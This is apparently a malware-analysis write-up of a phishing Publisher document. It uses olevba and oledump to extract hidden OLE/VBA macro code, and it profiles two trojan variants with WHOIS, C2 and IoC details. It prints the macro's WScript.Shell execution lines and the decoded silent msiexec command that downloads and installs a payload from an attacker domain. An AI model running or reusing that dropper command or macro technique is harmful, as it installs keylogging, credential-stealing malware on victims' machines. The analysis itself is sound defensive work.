As our analysis begins on the phishing email we additionally have a suspicious document (or .pub, .wiz). If we open the document with macros disabled it should safely open and look similar to this one:

suspicious word doc

After looking at the macros, the code looks relatively clean, but we wont be fooled by OLE Streams. OLE or Object Linking and Embedding is another mechanism which attackers can abuse to obfuscate and hide malware within Microsoft Office documents - despite its legitimate purpose.

So how do we scan for OLE objects?

Introducing oletools

Using the opensource package oletools we can quickly scan the document(or .pub) for suspicious/malicious calls:

$ olevba --decode ~/invoice.pub 
...abbrev...
-------------------------------------------------------------------------------
VBA FORM Variable "TextBox1" IN 'invoice.pub' - OLE stream: u'VBA/ZclBlack'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Set arabsky = CreateObject("WScript.Shell")
arabsky.Exec("AAA")
+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| AutoExec   | Document_Open        | Runs when the Word or Publisher         |
|            |                      | document is opened                      |
| Suspicious | Shell                | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | WScript.Shell        | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | run                  | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | CreateObject         | May create an OLE object                |
| Suspicious | sample               | May detect Anubis Sandbox               |
| Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
|            |                      | be used to obfuscate strings (option    |
|            |                      | --decode to see all)                    |
| Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
|            |                      | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| IOC        | notepad.exe          | Executable file name                    |
| Hex String | '\t\xfd.\xff'        | 09FD2EFF                                |
| Hex String | '\x00\xc0O\x8e\xf3-' | 00C04F8EF32D                            |
| Hex String | '\xba\xda\xe2\x11'   | badae211                                |
| Hex String | '\xba\xda\xe2\x12'   | badae212                                |
| Hex String | '\xba\xda\xe24'      | badae234                                |
| Hex String | '\xd9!\xcb\x9a'      | D921CB9A                                |
| Hex String | '\xf1U\xc6\xae\xa09' | F155C6AEA039                            |
| Hex String | '<%\xe1@'            | 3C25E140                                |
| Hex String | '\xe6A\xbc\x90\xa2{' | E641BC90A27B                            |
| Base64     | =>L                  | PT5M                                    |
| String     |                      |                                         |
| Base64     | 'e\xc9A\x95\xa7$'    | ZclBlack                                |
| String     |                      |                                         |
+------------+----------------------+-----------------------------------------+

Here we can see a few interesting calls that indeed alert us to this document being suspicious/malicious:

  • Document_Open
  • WScript.Shell
  • Numerous hex strings

Note The attacker has even tried to fool analysts by pretending that the macro potenital opens Notepad.exe

Back to extracting OLE Streams

Didier Stevens open-sourced a good tool for this job: oledump By default it will list and index all embedded OLE objects.

$ ./oledump.py  ~/invoice.pub 
  1:        94 '\x01CompObj'
  2:        12 '\x03Internal'
  3:       152 '\x05DocumentSummaryInformation'
  4:     16384 '\x05SummaryInformation'
  5:     10404 'Contents'
  6:         0 'Envelope'
  7:     25748 'Escher/EscherDelayStm'
  8:      1868 'Escher/EscherStm'
  9:        86 'Quill/QuillSub/\x01CompObj'
 10:      3584 'Quill/QuillSub/CONTENTS'
 11:       485 'VBA/PROJECT'
 12:        68 'VBA/PROJECTwm'
 13: M    9253 'VBA/VBA/ThisDocument'
 14: m    1159 'VBA/VBA/ZclBlack'
 15:      3940 'VBA/VBA/_VBA_PROJECT'
 16:       789 'VBA/VBA/dir'
 17:        97 'VBA/ZclBlack/\x01CompObj'
 18:       376 'VBA/ZclBlack/\x03VBFrame'
 19:       407 'VBA/ZclBlack/f'
 20:       348 'VBA/ZclBlack/o'

There are a number of interesting looking ZclBlack objects, so we will take a closer look at these

 $ ./oledump.py  -s 19 ~/invoice.pub 
...
00000070: 00 00 00 00 00 15 00 4C  61 62 65 6C 31 00 00 43  .......Label1..C
00000080: 3A 5C 57 69 6E 64 6F 77  73 5C 53 79 73 74 65 6D  :\Windows\System
00000090: 33 32 5C 6D 73 69 65 78  65 63 2E 65 78 65 00 D9  32\msiexec.exe..
000000A0: 13 00 00 AB 14 00 00 00  00 3C 00 F7 01 00 00 06  .........<......
000000B0: 00 00 80 0D 00 00 80 0A  00 00 00 32 00 00 00 38  ...........2...8
000000C0: 00 00 00 01 00 15 00 4C  61 62 65 6C 32 00 00 57  .......Label2..W
000000D0: 73 63 72 69 70 74 2E 53  68 65 6C 6C 00 00 00 D9  script.Shell....
000000E0: 13 00 00 0E 0E 00 00 00  00 38 00 F7 01 00 00 06  .........8......
...
$ ./oledump.py  -s 20 ~/invoice.pub 
...
000000F0: 40 00 00 80 CE 18 00 00  8B 07 00 00 53 65 74 20  @...........Set 
00000100: 61 72 61 62 73 6B 79 20  3D 20 43 72 65 61 74 65  arabsky = Create
00000110: 4F 62 6A 65 63 74 28 22  57 53 63 72 69 70 74 2E  Object("WScript.
00000120: 53 68 65 6C 6C 22 29 0D  0A 61 72 61 62 73 6B 79  Shell")..arabsky
00000130: 2E 45 78 65 63 28 22 41  41 41 22 29 00 02 1C 00  .Exec("AAA")....
00000140: 37 00 00 00 06 00 00 80  00 20 00 40 A5 00 00 00  7........ .@....
00000150: CC 02 00 00 54 61 68 6F  6D 61 00 00              ....Tahoma..
$ ./oledump.py  -s 18 ~/invoice.pub 
00000000: 56 45 52 53 49 4F 4E 20  35 2E 30 30 0D 0A 42 65  VERSION 5.00..Be
00000010: 67 69 6E 20 7B 43 36 32  41 36 39 46 30 2D 31 36  gin {C62A69F0-16
00000020: 44 43 2D 31 31 43 45 2D  39 45 39 38 2D 30 30 41  DC-11CE-9E98-00A
00000030: 41 30 30 35 37 34 41 34  46 7D 20 5A 63 6C 42 6C  A00574A4F} ZclBl
00000040: 61 63 6B 20 0D 0A 20 20  20 43 61 70 74 69 6F 6E  ack ..   Caption
00000050: 20 20 20 20 20 20 20 20  20 3D 20 20 20 22 55 73           =   "Us
00000060: 65 72 46 6F 72 6D 31 22  0D 0A 20 20 20 43 6C 69  erForm1"..   Cli
00000070: 65 6E 74 48 65 69 67 68  74 20 20 20 20 3D 20 20  entHeight    =  
00000080: 20 33 31 38 30 0D 0A 20  20 20 43 6C 69 65 6E 74   3180..   Client
00000090: 4C 65 66 74 20 20 20 20  20 20 3D 20 20 20 34 35  Left      =   45
000000A0: 0D 0A 20 20 20 43 6C 69  65 6E 74 54 6F 70 20 20  ..   ClientTop  
000000B0: 20 20 20 20 20 3D 20 20  20 33 37 35 0D 0A 20 20       =   375..  
000000C0: 20 43 6C 69 65 6E 74 57  69 64 74 68 20 20 20 20   ClientWidth    
000000D0: 20 3D 20 20 20 34 37 31  30 0D 0A 20 20 20 53 74   =   4710..   St
000000E0: 61 72 74 55 70 50 6F 73  69 74 69 6F 6E 20 3D 20  artUpPosition = 
000000F0: 20 20 31 20 20 27 43 65  6E 74 65 72 4F 77 6E 65    1  'CenterOwne
00000100: 72 0D 0A 20 20 20 54 61  67 20 20 20 20 20 20 20  r..   Tag       
00000110: 20 20 20 20 20 20 3D 20  20 20 22 6B 3D 34 20 64        =   "k=4 d
00000120: 3D 34 20 7A 3D 31 31 31  20 2F 71 20 2F 6E 6F 72  =4 z=111 /q /nor
00000130: 65 73 74 61 72 74 20 2F  69 20 68 74 74 70 3A 2F  estart /i http:/
00000140: 2F 6F 66 66 69 63 65 68  6F 6D 65 6D 73 2E 63 6F  /officehomems.co
00000150: 6D 2F 6C 73 6D 22 0D 0A  20 20 20 54 79 70 65 49  m/lsm"..   TypeI
00000160: 6E 66 6F 56 65 72 20 20  20 20 20 3D 20 20 20 32  nfoVer     =   2
00000170: 30 0D 0A 45 6E 64 0D 0A                           0..End..

Simplified version:

  • msiexec k=4 d=4 z=111 /q /norestart /i http://officehomems.com/lsm

By inserting the URL into VirusTotal we can gather evidence that confirms our suspicions that this is an attack

VT on sample

Next we perform our research against the URL and the domain name:

dig officehomems.com +short
54.38.15.250

Whois Records:

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: OFFICEHOMEMS.COM
Registry Domain ID: 2328611896_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.imena.ua
Registrar URL: http://imena.ua
Updated Date: 2018-11-29T14:48:21Z
Creation Date: 2018-11-02T05:44:13Z
Registrar Registration Expiration Date: 2019-11-02T05:44:13Z
Registrar: Internet Invest, Ltd. dba Imena.ua
Registrar IANA ID: 1112
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientHold https://icann.org/epp#clientHold
Registry Registrant ID: Not Available From Registry
Registrant Name: Whois privacy protection service
Registrant Organization: Internet Invest, Ltd. dba Imena.ua
Registrant Street: Gaidara, 50 st.   
Registrant City: Kyiv
Registrant State/Province: Kyiv
Registrant Postal Code: 01033
Registrant Country: UA
Registrant Phone: +380.442010102
Registrant Phone Ext: 
Registrant Fax: +380.442010100
Registrant Fax Ext: 
Registrant Email: hostmaster@imena.ua
Registry Admin ID: Not Available From Registry
Admin Name: Whois privacy protection service

A Tale of Two Payloads

By the time we got this far in the investigation, we noticed that the attackers had modified their email address, subject lines and payload/attachments.

We deduce that this is due to a large number of bounced emails, as the anti-spam filters kick into action and block the first sample. Is the attacker actively monitoring their mailserver? or is this purely automated?

So now we have two variants to analyse:

Again, a quick search on Virus Total reveals these are indeed Trojan pieces of code: VT on sample VT on sample

Varient 1

  • Dropper URL: http://officehomems.com/lsm
  • lsm.msi (Packer EnigmaProtector)
  • %TEMP%\Data1\lsm.exe (registered as a service)
  • sha256 fb3b69917db8434655298eed9ce269b6b6029c275b38fa8eda9d8a3cd415b39
  • size: 305KiB
  • Timestamp 2 Nov 2018

API Functions

  • SystemInfo enum
  • User enum (local & domain)
  • Keylogger
  • Privilege Escaltion via Token stealing and manipulation
  • Send/Receive Files
  • Enumerate WiFi / steal WiFi key
  • Persistance via registry Microsoft\Windows\CurrentVersion\Run
  • Screen capture
  • Checks if virtualbox / virtualbox plugins is/are installed
  • Raids browser cookies in chrome and firefox (cookies.sqlite)
  • Uses volume shadow copy (vssvc.exe) to create a shadow copy

Varient 2

  • Dropper URL: mshomebox365.com/plugin
  • storsvc.exe
  • %TEMP%\Data1\storsvc.exe (registered as a service)
  • sha256 419ffcb88cfe2441b782c7afbf0309c591fb13de59a20252519decac2c9a9d85
  • size: 308KiB
  • Timestamp 2 Nov 2018

Whois Record (Possibly the same Actor hiding behind same registrar):

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: MSHOMEBOX365.COM
Registry Domain ID: 2328303647_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.imena.ua
Registrar URL: http://imena.ua
Updated Date: 2018-11-29T14:48:31Z
Creation Date: 2018-11-01T09:07:11Z
Registrar Registration Expiration Date: 2019-11-01T09:07:11Z
Registrar: Internet Invest, Ltd. dba Imena.ua
Registrar IANA ID: 1112
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientHold https://icann.org/epp#clientHold
Registry Registrant ID: Not Available From Registry
Registrant Name: Whois privacy protection service
Registrant Organization: Internet Invest, Ltd. dba Imena.ua
Registrant Street: Gaidara, 50 st.   
Registrant City: Kyiv
Registrant State/Province: Kyiv
Registrant Postal Code: 01033
Registrant Country: UA
Registrant Phone: +380.442010102
Registrant Phone Ext: 
Registrant Fax: +380.442010100
Registrant Fax Ext: 
Registrant Email: hostmaster@imena.ua
Registry Admin ID: Not Available From Registry
Admin Name: Whois privacy protection service
Admin Organization: Internet Invest, Ltd. dba Imena.ua

API Functions

API from delphi based program:

  • from Win32_ComputerSystem
  • GenerateIdKey
  • get token information
  • get_Azure
  • get_botnetAdress
  • get_botnetServerRequestRetryDelay
  • get_command
  • get_commandsManager
  • get_Data
  • get_debug
  • get_ip
  • get_Is64BitOperatingSystem
  • get_IsCompleted
  • get_keyLoggerManager
  • get_MachineName
  • get_Now
  • get_OSVersion
  • get_Owner
  • … more…

Command and Control

Botnet URL:

  • http://89.144.25.16/backnet/

Through further analysis of the binaries, and PCAP dumps from Cuckoo, we can see that the payload is dialling home using POST requests. Unfortunately, there is no response? for us to continue the dynamic analysis into the Command and Control Server.

Post Data – sends repeatidly – no reply observed? :

data={"host_key":"711a0c25f2ec62880fa8a7afe2bf90adfe28c0b23eb0a536147529ffacb66dae","name":"admin@PC"}

Conclusion

Cross-referencing with the proofpoint article we can see that this matches their analysis of the November 15 “Downloader” Campaign

References

IoCs

url officehomems.com,officehomems.com/lsm 54.38.15.250
url mshomebox365.com,mshomebox365.com/plugin 185.17.121.194
url 89.144.25.16/backnet/ 89.144.25.16
hashes fb3b69917db8434655298eed9ce269b6b6029c275b38fa8eda9d8a3cd415b39 lsm.msi
hashes 419ffcb88cfe2441b782c7afbf0309c591fb13de59a20252519decac2c9a9d85 storsvc.msi
dropper %TEMP%\Data1\lsm.exe Timestamp 2 Nov 2018
dropper %TEMP%\Data1\storsvc.exe Timestamp 2 Nov 2018
OLE/VBA VBA/ZclBlack  

Share on: